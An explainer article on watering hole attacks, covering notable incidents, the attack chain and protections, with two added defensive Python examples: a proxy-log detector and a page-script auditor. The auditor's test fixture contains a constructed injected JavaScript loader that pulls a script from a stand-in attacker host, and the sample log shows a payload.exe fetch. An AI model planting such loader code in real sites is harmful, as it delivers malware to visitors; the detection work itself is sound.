A watering hole attack is a type of cyber attack in which an attacker observes the websites that a victim or a particular group visits on a regular basis and infects those sites with malware. Because the compromised sites are ones the targets already trust and visit routinely, a watering hole attack has the potential to infect many members of the targeted group.
The malware used in watering hole attacks usually collects the target’s personal information and sends it back to the attacker-operated command-and-control (C&C) server. Sometimes the malware also gives attackers full access to the victims’ systems.
Some notable incidents illustrating the success of ‘Watering hole attacks’:
- In 2013, high-profile websites such as Facebook, Twitter, Microsoft, and Apple were exploited to perform watering hole attacks.
- In 2017, the Lazarus threat actor group conducted watering hole attacks to infiltrate financial institutions in Poland, Mexico, the U.K., and the United States.
- In 2018, almost 21 websites, including those of the Ministry of Defense of Cambodia and the Ministry of Foreign Affairs and International Cooperation of Cambodia, were compromised by the OceanLotus threat actor group in a watering hole attack.
How does a ‘Watering hole attack’ work?
- The attacker first observes which websites a victim or a particular group visits often, and then infects those frequently visited websites with malware.
- The attacker then identifies vulnerabilities in those websites and injects malicious code, often JavaScript or HTML, into the ads, banners, and other content displayed on the website.
- The malicious code then redirects members of the targeted group to a phishing site where the malware or malvertisements are hosted.
- When the targeted group visits these websites, a script containing malware is automatically downloaded onto the victims’ machines.
- The malware then collects the victims’ personal information and sends it back to the C&C server operated by the attacker.
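The chain described above (trusted site loads a third-party script, which then pulls a payload from the same unfamiliar domain) leaves a recognisable trace in web proxy logs. The following is an added example, not code from the original article: it walks a constructed proxy log, groups requests by client, and flags any client that, while on a watched site, loaded a script from a domain outside a known allowlist and then fetched an executable from that domain within a short window. The log layout (timestamp, client IP, method, URL, status, referer) and the allowlist are assumptions chosen for the example.

```python
"""Detect a watering-hole style redirect chain in web proxy logs.

Added example (not from the original article). The log lines are constructed
for illustration; the field layout (timestamp, client, method, url, status,
referer) is an assumption, not a specific proxy product's format.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample proxy log: timestamp client method url status referer ("-" = none)
SAMPLE_LOG = """\
2024-05-01T09:00:01 10.0.0.5 GET https://news.example.org/index.html 200 -
2024-05-01T09:00:02 10.0.0.5 GET https://cdn.example.org/app.js 200 https://news.example.org/index.html
2024-05-01T09:00:02 10.0.0.5 GET https://stat-collector.example.net/ld.js 200 https://news.example.org/index.html
2024-05-01T09:00:03 10.0.0.5 GET https://stat-collector.example.net/payload.exe 200 https://stat-collector.example.net/ld.js
2024-05-01T09:05:00 10.0.0.7 GET https://news.example.org/index.html 200 -
2024-05-01T09:05:01 10.0.0.7 GET https://cdn.example.org/app.js 200 https://news.example.org/index.html
"""

# Assumption: domains already known as legitimate dependencies of the watched sites
KNOWN_DOMAINS = {"news.example.org", "cdn.example.org"}
SCRIPT_SUFFIXES = (".js",)
DROPPER_SUFFIXES = (".exe", ".dll", ".scr", ".hta")


def parse_line(line):
    """Split one constructed log line into a dict; referer '-' becomes None."""
    ts, client, method, url, status, referer = line.split()
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "status": int(status),
            "referer": None if referer == "-" else referer}


def host(url):
    return urlparse(url).hostname or ""


def path(url):
    return urlparse(url).path.lower()


def find_suspicious_chains(log_text, watched_sites, known_domains=KNOWN_DOMAINS,
                           window=timedelta(seconds=30)):
    """Return one alert per client that, while on a watched site, loaded a script
    from an unknown domain and then fetched an executable from that same domain."""
    events = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)

    alerts = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            ref_host = host(e["referer"]) if e["referer"] else ""
            if ref_host not in watched_sites:
                continue  # not triggered from a site we are watching
            h = host(e["url"])
            if h in known_domains or not path(e["url"]).endswith(SCRIPT_SUFFIXES):
                continue  # known dependency, or not a script load
            # Third-party script loaded from a watched site: look for a follow-on
            # binary fetch from the same unknown domain inside the time window.
            for f in evs[i + 1:]:
                if f["ts"] - e["ts"] > window:
                    break
                if host(f["url"]) == h and path(f["url"]).endswith(DROPPER_SUFFIXES):
                    alerts.append({"client": client, "site": ref_host, "third_party": h,
                                   "script": e["url"], "binary": f["url"]})
                    break
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_chains(SAMPLE_LOG, {"news.example.org"}):
        print(alert)
```

The allowlist is what keeps this useful: a watched site will legitimately load scripts from its own CDN, so only script hosts that are new for that site, followed by a binary download from the same host, produce an alert. In practice the allowlist would be built from a baseline crawl of each watched site rather than typed by hand.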
Examples of Watering hole attacks
Example 1 - In 2017, Lazarus, the hacker group from North Korea, launched a ‘watering hole attack’ by infecting with malware the websites that the targeted victims were likely to visit.
The malware was designed to infect only visitors whose IP address showed they belonged to 104 specific organizations in 31 countries. The majority of targets were in Poland, followed by the United States, Mexico, Brazil, and Chile.
Example 2 - In 2018, the OceanLotus threat actor group, also known as APT32, launched a watering hole attack that compromised almost 21 websites. All 21 compromised websites redirected visitors to a separate domain controlled by the OceanLotus group.
The compromised websites included those of the Ministry of Defense of Cambodia, the Ministry of Foreign Affairs and International Cooperation of Cambodia, and several Vietnamese newspaper and blog websites.
Generally, in a watering hole attack, the attackers compromise websites that are frequently visited by potential targets. In this attack, however, OceanLotus also compromised some websites that attract large numbers of visitors beyond its presumed targets.
How to stay protected from ‘Watering hole’ attacks?
- Update all your software to the latest versions and keep your operating system up to date.
- Properly configure firewalls and other network security products.
- Monitor the popular websites that employees visit and ensure that those sites are free from malware.
- Ensure your organization’s own websites are free from malware.
- Hide your online activities with a VPN and your browser’s private browsing feature.
- Configure security tools to notify users of compromised websites.
- Educate employees about watering hole attacks.
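Two of the recommendations above (monitoring the sites employees visit, and keeping the organization’s own sites clean) come down to the same check: compare what a page serves today with a known-good baseline and flag anything that was not there before. The following is an added example, not code from the original article: it parses a page with Python’s standard-library HTML parser, reports external script or iframe sources from hosts outside a first-party allowlist, and reports inline scripts whose hash is absent from the baseline. The page content, the allowlist hosts and the baseline are all constructed for the example; in practice the baseline would be captured from a trusted crawl of the site.

```python
"""Audit a web page for injected scripts/iframes against a known-good baseline.

Added example (not from the original article). The HTML, the allowlist and the
baseline are constructed; the hostnames are placeholders.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the organisation's page is allowed to load resources from
ALLOWED_HOSTS = {"www.example.gov", "static.example.gov"}


class ScriptCollector(HTMLParser):
    """Collect external <script>/<iframe> sources and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # (tag, src) for scripts/iframes with a src attribute
        self.inline = []        # body text of inline <script> elements
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            self.external.append((tag, a["src"]))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def collect(html):
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p


def build_baseline(html):
    """SHA-256 fingerprints of every inline script on a known-good copy of the page."""
    return {hashlib.sha256(s.encode()).hexdigest() for s in collect(html).inline}


def audit_page(html, baseline_inline_hashes, allowed_hosts=ALLOWED_HOSTS):
    """Return findings: external resources from unknown hosts, and inline scripts
    whose hash is not in the baseline (i.e. content added since the baseline)."""
    p = collect(html)
    findings = []
    for tag, src in p.external:
        h = urlparse(src).hostname
        if h is None:
            continue  # relative URL: same origin, accepted
        if h not in allowed_hosts:
            findings.append(("unknown_host", tag, src))
    for s in p.inline:
        if hashlib.sha256(s.encode()).hexdigest() not in baseline_inline_hashes:
            findings.append(("new_inline_script", "script", s[:60]))
    return findings


# Constructed known-good page and a constructed copy with an injected loader.
KNOWN_GOOD_HTML = """<html><head>
<script src="/assets/site.js"></script>
<script src="https://static.example.gov/analytics.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
</head><body><p>Ministry news</p></body></html>"""

COMPROMISED_HTML = KNOWN_GOOD_HTML.replace(
    "</head>",
    '<script src="https://stat-collector.example.net/ld.js"></script>\n'
    '<script>(function(){var s=document.createElement("script");'
    's.src="https://stat-collector.example.net/ld.js";'
    'document.head.appendChild(s);})();</script>\n</head>')

BASELINE = build_baseline(KNOWN_GOOD_HTML)

if __name__ == "__main__":
    print("known-good:", audit_page(KNOWN_GOOD_HTML, BASELINE))
    print("compromised:", audit_page(COMPROMISED_HTML, BASELINE))
```

Hashing inline scripts rather than diffing whole pages keeps the check stable on sites whose article text changes daily while their script blocks do not; any change to a script block is then worth a human look, even when the new code loads from an allowlisted host.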